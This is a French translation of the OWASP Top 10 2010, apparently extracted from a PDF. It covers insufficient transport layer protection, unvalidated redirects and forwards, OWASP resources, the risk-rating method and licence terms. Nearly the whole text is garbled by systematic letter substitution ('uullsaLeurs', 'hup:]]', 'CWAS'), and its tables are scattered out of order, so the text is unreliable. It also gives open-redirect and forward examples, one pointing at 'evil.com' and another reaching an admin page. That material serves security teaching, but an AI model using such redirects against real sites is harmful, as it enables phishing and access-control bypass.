4. S'assurer que le cerucaL esL vallde, non explre, non revoque eL
correspondanL a Lous les domalnes uullses par le slLe.
. Les connexlons back-end devralenL aussl uullser SSL ou d'auLres
Lechnologles de chlremenL.
rotecnon |nsumsante de |a
couche 1ransport
A9
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
__________
Lxp|o|tab|||t
MCLNNL
rva|ence
kAkL
Dtecnon
IACILL
Impact
MCDk
__________
C o n s l d e r e z L o u L e
p e r s o n n e p o u v a n L
Lromper les uullsaLeurs
lors d'une requLe a
voLre slLe web. n'lmporLe
quel slLe web ou auLre
ux P1ML uullse peuL en
Lre la clble.
L'auaquanL cree des llens
vers des redlrecuons non
valldees eL lnvlLe les
uul l saLeurs a cl l quer
dessus. Les vlcumes sonL
encllns a cllquer sur ces
llens, pulsqu'lls polnLenL
vers un sl Le val l de.
L'auaquanL uullse les
renvols (forwards) non
srs pour conLourner des
conLrles de securlLe.
Les appl l cauons uul l senL frequemmenL l es
redlrecuons eL les renvols pour redlrlger les
uullsaLeurs vers d'auLres pages. arfols la page clble
esL speclee dans un parameLre non vallde,
permeuanL a un auaquanL de cholslr la page de
desunauon.
La deLecuon de redlrecuons non verlees esL faclle :
recherchez des redlrecuons o l'u8L compleLe peuL
Lre modlee. La deLecuon de renvols non verles
esL plus compllquee pulsqu'lls clblenL des pages
lnLernes.
ue Lelles redlrecuons
p e u v e nL p e r me ur e
l'lnsLallauon de loglclels
m a l v e l l l a n L s o u
l ' u s u r p a u o n
d'lnformauons senslbles
de l ' uul l saLeur. ues
renvols non srs peuvenL
permeure de conLourner
les conLrles d'acces.
Conslderez la valeur
meuer assoclee a la
conance des
uullsaLeurs.
Cu'advlendralL-ll s'lls
eLalenL pleges par un
loglclel malvelllanL
Cu'advlendralL-ll sl un
auaquanL avalL acces a
des foncuons lnLernes
Lxemp|e de scnar|os d'auaque
Scenarlo 1 : L'appllcauon possede une page nommee redlrecL.[sp
prenanL en compLe un seul parameLre nomme url. L'auaquanL cree
une u8L malvelllanLe redlrlgeanL les uullsaLeurs vers un slLe reallsanL
du hameonnage (0<2$<2#5) ou lnsLallanL des loglclels malvelllanLs
(6"&="+').
hup:]]www.examp|e.com]red|rect.[sp?ur|=ev||.com
Scenarlo 2 : L'appllcauon uullse des renvols pour achemlner des
requLes enLre dlerenLes parues du slLe. our faclllLer cela,
cerLalnes pages uullsenL un parameLre lndlquanL vers quelle page
l'uullsaLeur dolL Lre dlrlge en cas de succes de la Lransacuon. uans
ce cas, l'auaquanL cree une u8L sausfalsanL les conLrles d'acces de
l'appllcauon eL le dlrlgeanL ensulLe vers une foncuon admlnlsLraLeur
a laquelle ll ne devralL pas avolr acces.
hup:]]www.examp|e.com]bor|ng.[sp?fwd=adm|n.[sp
Su|s-[e vu|nrab|e?
La mellleure faon de verler sl une appllcauon possede des
redlrecuon ou renvols non valldes esL de :
1. Lxamlner le code pour LouLes les uullsauons de redlrecuons ou de
renvols (appele LransferLs en .nL1). uans chaque cas, ldenuez sl
l'u8L clble esL lncluse dans les parameLres. Le cas echeanL, verlez
que le(s) parameLre(s) sonL valldes pour conLenlr seulemenL une
desunauon auLorlsee ou un elemenL d'une desunauon auLorlsee.
2. arcourlr le slLe, an de verler s'll genere des redlrecuons (codes
P11 300-307, LyplquemenL 302). 8egarder sl les parameLres fournls
avanL la redlrecuon semblenL Lre une u8L clble ou un elemenL de
ceue u8L. Le cas echeanL, changer l'u8L clble eL observer sl le slLe
redlrlge vers la nouvelle clble.
3. Sl le code n'esL pas dlsponlble, verler Lous les parameLres pour
volr s'lls semblenL conLrlbuer a une redlrecuon ou a un renvol eL
LesLer ceux qul y conLrlbuenL.
kfrences
CWAS
CWAS Arucle on Cpen 8edlrecLs
LSAl SecurlLyWrapper8esponse send8edlrecL() meLhod
Lxternes
CWL LnLry 601 on Cpen 8edlrecLs
WASC Arucle on u8L 8edlrecLor Abuse
Coogle blog arucle on Lhe dangers of open redlrecLs
Comment empcher ceue auaque?
L'uullsauon sre des redlrecuons eL des renvols peuL Lre reallsee de
dlerenLes faons :
1. n'uullsez slmplemenL pas les redlrecuons eL les renvols.
2. Sl lls sonL uullses, n'lncluez pas de parameLres uullsaLeurs dans la
consLrucuon de la desunauon. Cecl esL LouL a falL reallsable!
3. Sl les parameLres de desunauon ne peuvenL pas Lre evlLes, velllez
a verler que les donnees salsles solenL valldes eL auLorlsees pour
l'uullsaLeur. ll esL recommande que Lous les parameLres de
desunauon alenL une valeur absLralLe pluLL que l'u8L ou une
poruon de l'u8L, eL que la Lraducuon de la valeur absLralLe en l'u8L
clble solL assuree par le serveur. Les appllcauons peuvenL uullser
LSAl pour benecler de la foncuon send8edlrecL() permeuanL de
s'assurer que les redlrecuons solenL sres.
LvlLer de Lelles fallles esL exLrmemenL lmporLanL car elle sonL la
clble favorlLe des hameonneurs (phlshers) LenLanL de gagner la
conance des uullsaLeurs.
ked|recnons et kenvo|s
non va||ds
A10
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
Crez et un||sez une b|b||othque comp|te de Contr|es de Scur|t communs
Cue vous soyez debuLanL ou de[a Lres experlmenLe dans la securlLe des appllcauons web, ll peuL s'averer dlmclle de reallser une
nouvelle appllcauon web, ou blen d'en securlser une exlsLanLe. LL la complexlLe explose sl vous devez lnLervenlr sur un grand
nombre d'appllcauons.
De nombreuses ressources CWAS sont d|spon|b|es en open-source
L'CWAS meL graLulLemenL a dlsposluon un grand nombre de ressources, an d'alder les organlsauons eL les developpeurs a
amellorer la securlLe de leurs appllcauons web avec emcaclLe eL a molndre coL. Les exemples cl-dessous lllusLrenL les domalnes
o l'CWAS peuL vous alder a securlser vos appllcauons web, compleLes dans les pages sulvanLes par d'auLres ressources relauves
a la valldauon eL a l'audlL de securlLe.
ll y a beaucoup d'auLres ressources CWAS dlsponlbles. Mercl de consulLer la page CWAS pro[ecLs page, qul llsLe l'ensemble des
pro[eLs CWAS, classes par nlveau de quallLe (alpha, beLa, ou release).La pluparL des ressources CWAS sonL dlsponlbles sur
noLre wlkl, eL de nombreux documenLs peuvenL Lre commandes sous une forme lmprlmee.
+D
- our falre une appllcauon securlsee, vous devez d'abord preclser ce que $/(-+24/ veuL dlre.
L'CWAS vous recommande d'uullser son gulde Appllcauon SecurlLy verlcauon SLandard (ASvS)
pour denlr les exlgences de securlLe de vos appllcauons. Ln cas de sous-LralLance, l'annexe
CWAS Secure Soware ConLracL Annex esL conselllee.
Lx|gences
de
Scur|t des
App||canons
- ll esL beaucoup plus renLable de developper une appllcauon en la securlsanL des sa concepuon
pluLL que de combler ses falblesses a posLerlorl. L'CWAS vous recommande son gulde CWAS
ueveloper's Culde pour vous alder a concevolr voLre appllcauon en s'auachanL a sa securlLe des
les premlers lnsLanLs du pro[eL.
Arch|tecture
Scur|se
- ll esL Lres dlmclle d'ecrlre des conLrles de securlLe robusLes eL comprehenslbles a la fols.
L'CWAS vous consellle d'uullser le pro[eL CWAS LnLerprlse SecurlLy Al (LSAl) comme
LemplaLe pour la securlsauon des lnLerfaces de vos appllcauons web. L'ensemble des conLrles
sLandards qu'll conuenL faclllLera grandemenL voLre developpemenL d'appllcauons en !ava, .nL1,
P, Classlc AS, yLhon eL Coldluslon.
Contr|es
de
Scur|t
Standards
- L'CWAS recommande le Modele CWAS Soware Assurance MaLurlLy Model (SAMM), qul
permeL aux organlsauons de denlr eL de meure en uvre une SLraLegle de SecurlLe adapLee a
leurs rlsques speclques, amelloranL alnsl leur processus de reallsauon d'appllcauons securlsees.
Cyc|e de
Dve|oppeme
nt
Scur|s
- Le pro[eL CWAS Lducauon ro[ecL fournlL un grand nombre de cours pour former au
developpemenL d'appllcauons securlsees, de mme qu'une collecuon de presenLauons CWAS
Lducauon resenLauons. our vous enLrainer a chercher des vulnerablllLes, auaquez le serveur
CWAS WebCoaL ! Lnn, pour vous Lenlr lnforme, paruclpez a une CWAS AppSec Conference,
ou a une reunlon de voLre chaplLre CWAS local.
1utor|aux
de
Scur|t
Concernant |es Dve|oppeurs
1est de |'app||canon: CWAS a reallse le 1esung Culde an
d'alder les developpeurs eL les speclallsLes de la securlLe des
appllcauons a comprendre commenL reusslr a vallder
emcacemenL la SecurlLe de leurs Appllcauons Web. Ce gulde
enorme, qul a eu de nombreux conLrlbuLeurs, couvre un
large specLre de Lechnlques de 1esLs de SecurlLe des
Appllcauons Web. 1ouL comme les 8evues de Code, les 1esLs
de SecurlLe onL leurs polnLs forLs : ll esL par exemple Lres
convalncanL de prouver qu'une Appllcauon Web n'esL pas
securlsee en demonLranL une auaque. Les 1esLs peuvenL
egalemenL deLecLer de nombreuses fallles llees a
l ' l nf rasLrucLure, l nvl sl bl es a l a 8evue de Code
pulsqu'eLrangeres a l'appllcauon elle-mme.
Cun|s de 1ests de ntranon: WebScarab, qul esL l'un des
ouuls les plus uullses de l'CWAS, esL un proxy lnLercepLeur
pour le LesL des Appllcauons Web. ll permeL a l'audlLeur de
vlsuallser LouLes les requLes de l'Appllcauon Web, ce qul
permeL de comprendre son foncuonnemenL lnLerne, ll peuL
ensulLe envoyer des requLes modlees an de volr sl elles
sonL LralLees avec SecurlLe. CeL ouul esL paruculleremenL
emcace pour Lrouver des fallles de cross-scrlpung,
d'auLhenucauon ou de conLrle d'acces.
Crgan|sez-vous
Concernant |es Va||deurs +V
Soyez organ|s
our vallder la securlLe d'une appllcauon que vous developpez ou que vous envlsagez d'acheLer, l'CWAS vous recommande de
conLrler son code source (sl ll esL dlsponlble), mals aussl de lul falre passer un LesL de peneLrauon. L'CWAS vous consellle
d'allleurs d'appllquer les deux Lechnlques aussl souvenL que necessalre : eLanL complemenLalres, leur synergle vous orlra un
resulLaL superleur a leurs polnLs forLs respecufs. our un analysLe experlmenLe, les ouuls d'alde a la valldauon peuvenL amellorer
son emcaclLe eL la perunence de ses resulLaLs. Les ouuls d'evaluauon de l'CWAS sonL focallses sur la manlere d'alder les experLs
a chercher plus emcacemenL, pluLL que de pousser l'auLomausauon de l'analyse elle-mme.
Norma||sez comment vous vr|hez |a Scur|t App||canve Web: l'CWAS a reallse la meLhode de valldauon Appllcauon SecurlLy
verlcauon SLandard (ASvS) pour alder les enLreprlses a amellorer la coherence eL la rlgueur de leurs evaluauons de SecurlLe des
Appllcauons Web : ce documenL denlL une meLhode sLandard mlnlmale de valldauon de la SecurlLe pour la condulLe de ces
evaluauons . L'CWAS vous recommande d'uullser ASvS comme gulde pour savolr ce qu'll fauL rechercher lors de la verlcauon
de la SecurlLe d'une Appllcauon Web, mals aussl quelles sonL les Lechnlques les plus approprlees au besoln, eL commenL cholslr eL
denlr le nlveau d'exlgence lors de la verlcauon de la SecurlLe d'une Appllcauon Web. L'CWAS vous recommande egalemenL
d'uullser ASvS pour vous alder a denlr eL cholslr les opuons des servlces en llgne de demande d'evaluauon que vous pourrlez
conLracLer aupres d'un fournlsseur uers.
Cun|s d'va|uanon: Le pro[eL Llve Cu de l'CWAS a reunl cerLalns des mellleurs ouuls de securlLe Cpen Source dans un
envlronnemenL booLable unlque. Les developpeurs web, LesLeurs eL professlonnels de la securlLe peuvenL booLer sur ce Cu Llve eL
avolr lmmedlaLemenL acces a une gamme compleLe de LesLs de securlLe. Aucune lnsLallauon ou congurauon n'esL necessalre
pour uullser les ouuls fournls sur ce Cu.
Aud|t de Code 1ests de Scur|t et de ntranon
lalre une 8evue de Code esL le mellleur moyen de verler
qu'une appllcauon esL blen securlsee. lalre des LesLs ne serL
qu'a prouver qu'une appllcauon n'esL 0"$ securlsee.
Aud|t du Code: en complemenL du CWAS uevoloper's Culde
eL du CWAS 1esung Culde, l'CWAS a developpe l'CWAS
Code 8evlew Culde, an d'alder les developpeurs eL les
speclallsLes de la securlLe des appllcauons a comprendre
commenL reusslr a securlser emcacemenL une Appllcauon
Web par la revue de son code. ll y a de nombreux problemes
poLenuels de SecurlLe dans les Appllcauons Web, comme par
exemple les vulnerablllLe aux ln[ecuons, qul sonL blen plus
faclles a Lrouver par 8evue de Code que par des LesLs
d'auaques exLernes.
Cun|s d'Aud|t de Code: l'CWAS a reallse des avancees
promeueuses pour asslsLer les experLs dans leurs 8evues de
Code, mals ces ouuls n'en sonL encore qu'a leurs debuLs. 8len
que les auLeurs de ces ouuls les uullsenL courammenL pour
eecLuer leurs propres 8evues de Code, les non-lnlues les
LrouveronL encore un peu dlmclle d'acces. Cn peuL clLer par
exemple CodeCrawler, Crlzon, eL C2.
Lancez ds ma|ntenant votre programme de Scur|sanon des App||canons
La SecurlLe des appllcauons n'esL plus opuonnelle. osluonnees enLre les auaques Lou[ours plus nombreuses eL les conLralnLes de
la lol, les organlsauons dolvenL posseder les compeLences pour reusslr a securlser leurs Appllcauons Web. LanL donne le nombre
lmpresslonnanL d'appllcauons eL de llgnes de code qul sonL de[a en producuon, de nombreuses organlsauons se demenenL pour
LralLer ceL enorme volume de vulnerablllLes. L'CWAS recommande aux organlsauons de meure en place un programme de
Securlsauon des Appllcauons an de mleux comprendre eL d'amellorer la securlLe de leur porLefeullle d'appllcauons. Auelndre
ceL ob[ecuf de SecurlLe necesslLe de falre collaborer emcacemenL de nombreuses equlpes d'une mme organlsauon : la securlLe,
l'audlL, le developpemenL de loglclels, mals aussl le managemenL commerclal eL execuuf. CeL ob[ecuf de SecurlLe dolL clalremenL
Lre amche, an que ces dlerenLs acLeurs pulssenL prendre connalssance eL comprendre quel esL le posluonnemenL de
l'organlsauon sur la SecurlLe. ll fauL enn meure en avanL les acuvlLes eL les resulLaLs qul aldenL a amellorer concreLemenL la
securlLe de l'enLreprlse en s'auaquanL a la reducuon des rlsques avec les meLhodes les plus renLables. Les programmes emcaces
de Securlsauon meuenL en uvre les acuvlLes lnconLournables cl-dessous :
Concernant |es Lntrepr|ses +C
- Labllssez un programme de SecurlLe des Appllcauons eL faiLes-le approuver.
- laiLes une eLude de vos lacunes en comparanL voLre organlsauon a ses semblables pour ldenuer vos
prlnclpaux axes d'amellorauon eL denlr un plan d'acuon.
- CbLenez l'approbauon du managemenL, eL meuez en place une campagne de senslblllsauon a la
SecurlLe dans LouLes les parues de voLre organlsauon concernees par l'lnformauque.
rem|re
Ltape
- laiLes l'lnvenLalre de vos Appllcauons eL classez-les en foncuon de leurs rlsques lnherenLs.
- Creez un modele de documenL d'analyse de rlsque pour evaluer eL classer vos Appllcauons.
Creez des regles d'assurance quallLe pour denlr la couverLure eL le nlveau de durclssemenL requls.
- uenlssez un modele commun de nlveaux de rlsques, s'appuyanL sur un ensemble coherenL de
probablllLes eL d'lmpacLs, eL represenLauf de l'approche de gesuon des rlsques de voLre organlsauon.
Ia|re un
Inventa|re
Cr|ent
k|sque
- uenlssez un recuell de dlrecuves eL de sLandards, qul sera le referenuel de SecurlLe auquel devronL
adherer LouLes les equlpes de developpemenL.
- Assoclez-y un ensemble de conLrles de SecurlLe reuullsables, eL fournlssez la documenLauon qul
expllque commenL les uullser pendanL le deslgn eL le developpemenL.
- uenlssez un cursus de formauon obllgaLolre a la SecurlLe des Appllcauons, qul sera adapLe aux
dlerenLs rles eL domalnes des meuers du developpemenL.
ermeure
une
8ase
So||de
- A[ouLez des Lches d'lmplemenLauon eL de verlcauon de la SecurlLe dans vos processus
operauonnels eL de developpemenL, comme par exemple l'eLude des menaces, deslgn eL revue de
deslgn, audlL, codage eL revue de code orlenLes SecurlLe, LesLs de peneLrauon, mlse en conformlLe,
eLc...
- Meuez en place les experLs Lechnlques eL le supporL necessalre pour assurer la reusslLe du
developpemenL eL des equlpes pro[eL.
Intgrer |a
Scur|t
dans |es
rocess
Lx|stants
- Managez grce aux meLrlques. uecldez des evoluuons eL des acuvlLes de fond en foncuon des reLours
Lerraln eL de leur analyse. ar exemple, le respecL des conslgnes eL des Lches de securlLe, les
vulnerablllLes lnLrodulLes eL resolues, la couverLure des appllcauons, eLc...
- Analysez les remonLees du developpemenL eL de la valldauon pour ldenuer la cause des problemes
eL la ralson des vulnerablllLes, dans le buL de lancer des amellorauons dans l'enLreprlse, LanL sur le
plan sLraLeglque qu'organlsauonnel.
Cr|r de |a
V|s|b||t
de Gesnon
Sl les verslons precedenLes du 1op 10 de l'CWAS meualenL en avanL l'ldenucauon des vulnerablllLes les plus communes, ces
documenLs onL [usqu'a presenL Lou[ours eLe consLrulLs auLours des rlsques assocles. Cecl a eu pour eeL de creer quelques
confuslons comprehenslbles chez ceux qul cherchalenL une Laxlnomle hermeuque des fallles. Ceue verslon clarle le rle cenLral
du rlsque dans le 1op 10 en eLanL plus expllclLe sur la faon donL les elemenLs menaanLs, vecLeurs d'auaques, fallles, lmpacLs
Lechnlques, eL lmpacLs meuers se comblnenL pour produlre des rlsques.
our ce falre, une meLhodologle de classemenL des 8lsques a eLe speclquemenL developpee pour le 1op 10, basee sur la
meLhodologle CWAS 8lsk 8aung MeLhodology. our chaque lLem du 1op 10, nous avons esume le rlsque Lype lnLrodulL par les
fallles les plus communes aupres d'une appllcauon web Lyplque en regardanL les facLeurs de probablllLes eL d'lmpacL moyens de
chacune de ces fallles. nous avons classe le 1op 10 en foncuon des fallles qul presenLenL le rlsque le plus slgnlcauf pour une
appllcauon.
La meLhodologle CWAS 8lsk 8aung MeLhodology denle de nombreux facLeurs pour alder a calculer le rlsque assocle a une
vulnerablllLe ldenuee. CependanL, le 1op 10 parle de generallLes eL non de vulnerablllLes speclques a des appllcauons reelles. ll
ne nous esL donc pas posslble d'Lre aussl precls que le responsable d'un sysLeme dans l'esumauon des rlsques pesanL sur leur(s)
appllcauon(s). nous ne connalssons nl l'lmporLance de vos appllcauons, nl celle de vos donnees, nl vos menaces, nl commenL
voLre sysLeme a eLe consLrulL, nl commenL ll esL gere.
our chaque fallle ldenuee, noLre meLhodologle lncluL Lrols facLeurs de probablllLe (prevalence, deLecuon, explolLablllLe) eL un
facLeur d'lmpacL (Lechnlque). La prevalence d'une fallle esL un facLeur que vous n'avez LyplquemenL pas a calculer. our les
donnees de prevalence, des enLreprlses d'horlzons varles nous onL fournl leur sLausuques que nous avons rassemblees eL
moyennees pour obLenlr la llsLe 1op 10 des probablllLes d'exlsLence des fallles classees par prevalence. LnsulLe, chaque donnee
de prevalence a eLe comblnee avec les deux auLres facLeurs de probablllLes (deLecuon eL explolLablllLe) pour calculer un Laux de
vralsemblance de chaque fallle. Lnn, ce Laux a eLe muluplle par l'lmpacL Lechnlque moyen que nous avons esume pour abouur a
un classemenL du rlsque global de chaque lLem du 1op 10.
noLez que ceue approche ne uenL pas compLe des probablllLes des menaces. Llle ne consldere pas non plus les nombreux deLalls
Lechnlques propres a vos appllcauons. 1ous ces facLeurs peuvenL pourLanL avolr une lncldence slgnlcauve sur la probablllLe
oerLe a un auaquanL de Lrouver eL d'explolLer une vulnerablllLe parucullere. Ce classemenL ne uenL pas compLe non plus de
l'lmpacL eecuf sur voLre meuer. voLre enLreprlse devra sLaLuer sur le nlveau de rlsque securlLe qu'elle esL en mesure d'accepLer
de ses appllcauons. Le 1op 10 na pas pour buL de falre ceue analyse de rlsque a voLre place.
Ln gulse d'exemple, le schema sulvanL lllusLre noLre calcul de rlsque pour l'lLem A2: Cross-SlLe Scrlpung. noLez que les fallles SS
sonL sl frequenLes que ce sonL les seules a avolr une frequence 18LS 8LAnuuL . 1ouL les auLres rlsques sonL classes de
repandu a peu commun (valeurs 1 a 3).
+k
kemarques au su[et des r|sques
I| s'ag|t de k|sques, Non de Ia|||es
__________
Lxp|o|tab|||t
MCLNNL
Irquence
1kLS kLANDUL
Detecnon
IACILL
Impact
MCDLkL
__________
2 0
1
1
*
2
2
Vu|nrab|||t
de scur|t
Vecteurs
d'auaque
Impacts
techn|que
Agents de Menace
Impacts
d'aa|re
Deta||s sur |es facteurs de
r|sques
+I
Le tab|eau c|-dessous prsente un rsum du 1op 10 2010 des k|sques de Scur|t des App||canons, a|ns| que |es facteurs de
r|sque que nous avons aur|bus chaque r|sque. Ces facteurs sont |ssus des donnes stansnques d|spon|b|es et de
|'expr|ence de |'qu|pe de |'CWAS. our comprendre |es r|sques pesant sur une app||canon ou une entrepr|se, vous devez
ten|r compte de vos propres menaces et |mpacts mners. Mme |es fa|||es |og|c|e||es agrantes ne devra|ent pas reprsenter
un r|sque sr|eux s'|| n'ex|ste aucun |ment de menace en pos|non de mener une auaque ou s| |'|mpact mner est
ng||geab|e pour |es b|ens en [eux.
ksum des Iacteurs de k|sques du 1op 10
Autres k|sques Cons|drer
Ia|||e de
Scur|t
Vecteurs
d'Auaque
Impacts
1echn|ques
L|ments
Menaants
Impacts
Mner
rdom|nance Dtecnon Lxp|o|tab|||t Impact
IACILL
IACILL
IACILL
IACILL
IACILL
IACILL
IACILL
IACILL
IACILL
IACILL
DIIIICILL
DIIIICILL
DIIIICILL
DIIIICILL
kISUL
kLANDUL
LU CCMMUNL
1kLS kLANDUL
CCMMUNL
MCDLkL
CCMMUNL
CCMMUNL
CCMMUNL
CCMMUNL
MCLNNL
MCLNNL
LU CCMMUNL
LU CCMMUNL
DIIIICILL
DIIIICILL
DIIIICILL
MCLNNL
MCDLkL
MCDLkL
MCDLkL
MCDLkL
MCDLkL
MCDLkL
SLVLkL
SLVLkL
SLVLkL
Le 1op 10 couvre de nombreux doma|nes, cependant d'autres r|sques sont cons|drer et va|uer dans votre entrepr|se.
ue|ques uns appara|ssa|ent dans |es vers|ons prcdentes du 1op 10, d'autres non, parm| |esque|s |es nouve||es techn|ques
d'auaque qu| appara|ssent en permanence. Lxemp|e d'autres r|sques |mportants de scur|t app||canfs (||sts par ordre
a|phabnque) que vous devr|ez ga|ement cons|drer:
- Le C||ck[ack|ng (1echn|que d'auaque rcente dcouverte en 2008)
- Les accs concurrenne|s
- Les dn|s de serv|ce (Lntre A9 du 1op 10 2004)
- Les fu|tes d'|nformanon et |a mauva|se gesnon des erreurs (Inc|us dans |'entre A6 du 1op 10 2007)
- Le manque de mesures d'ann-automansanon
- La gesnon |nsumsante des |ogs et de |'|mputab|||t (||es |'entre A6 du 1op 10 2007)
- Le manque de dtecnon d' |ntrus|on et de rponse |ntrus|on
- L'excunon de hch|ers ma||c|eux (Lntre A3 du 1op 10 2007)
A1-In[ecnon
A2-kSS
A3-Authent
A4-DCk
AS-CSkI
A6-Conhg
A7-Crypto
A8-Accs UkL
A9-1ransport
A10-ked|recnons
LLS ICCNLS CI-DLSSCUS kLkLSLN1LN1 LLS
DIIILkLN1LS VLkSICNS DISCNI8LLS CUk LL
1I1kL DL CL1 CUVkAGL
ALnA: Le conLenu de CuallLe Alpha esL un broulllon de
Lravall. C'esL une esqulsse en developpemenL [usqu'au nlveau de
publlcauon superleur.
8L1A: Le conLenu de CuallLe 8eLa correspond au nlveau de
publlcauon sulvanL. ll resLe en developpemenL [usqu'a la
prochalne publlcauon.
kLLLASL: Le conLenu de CuallLe 8elease eL le nlveau de
quallLe le plus hauL dans le cycle de vle d'un llvre, c'esL un
produlL nallse.
L'Cpen Web Appllcauon SecurlLy ro[ecL (CWAS) esL une communauLe mondlale llbre eL ouverLe focallsee sur
l'amellorauon de la securlLe des appllcauons loglclelles. noLre mlsslon esL de rendre la securlLe des appllcauons vlslble,
pour que les parucullers eL les enLreprlses pulssenL prendre des declslons LenanL compLe des rlsques de securlLe lles aux
appllcauons. Chacun esL llbre de paruclper a l'CWAS eL LouLes nos ressources sonL dlsponlbles sous llcence llbre eL
graLulLe. La fondauon CWAS esL une assoclauon a buL non lucrauf de Lype 01c3 qul garanuL la dlsponlblllLe fuLure eL le
supporL de nos Lravaux.
de partager - copier, distribuer et
transmettre ce travail
de remixer - d'adapter ce travail
VCUS L1LS LI8kLS :
SCUS LLS CCNDI1ICNS SUIVAN1LS:
Aur|bunon - Vous devez attribuer ce travail
conformment la spcification des auteurs
ou concdants (mais sans jamais suggrer
qu'ils vous soutiennent ou approuvent
l'usage que vous en fates
artage des Cond|nons In|na|es |'Idennque -
Si vous altrez, transformez ou vous
appuyez sur ce travail, vous devez distribuer
le travail rsultant uniquement sous la mme
licence, sous une licence similaire ou sous
une licence compatible.